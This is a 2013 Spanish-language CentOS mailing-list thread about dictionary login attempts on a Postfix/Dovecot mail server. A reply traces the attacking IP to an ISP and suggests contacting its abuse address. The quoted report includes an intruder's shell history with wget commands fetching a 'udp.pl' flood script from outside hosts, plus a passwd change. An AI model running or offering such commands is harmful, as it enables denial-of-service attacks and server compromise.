[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Francesc Guitart
francesc.guitart en enise.fr
Vie Mar 22 08:32:03 UTC 2013
Hola,
Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit :
> Buenos días a todos de la lista:
> Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
> ------------------------
>
> dovecot:
>
> Authentication
> Failures:
>
> contacto
> rhost=66.142.38.137 : 88 Time(s)
>
>
[...]
> turismo
> rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
>
> check pass;
> user unknown: 3901 Time(s)
> Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto.
> el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit
> El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo.
> Saludos
> Luis Roman
>
Como te ha respondido José Fernández los logs muestran intentos de
conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL
de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell,
que a su vez parece ser propiedad de AT&T:
adsl-66-142-38-137.dsl.kscymo.swbell.net
Si siempre es esta IP la que trata de acceder a tu servidor contacta con
ellos, tienen una cuenta de correo para estos casos. Escríbeles a
abuse en swbell.net y explícales el problema. Deberían poner remedio.
http://public.swbell.net/contact.html
Saludos.
--
Francesc Guitart
Más información sobre la lista de distribución CentOS-es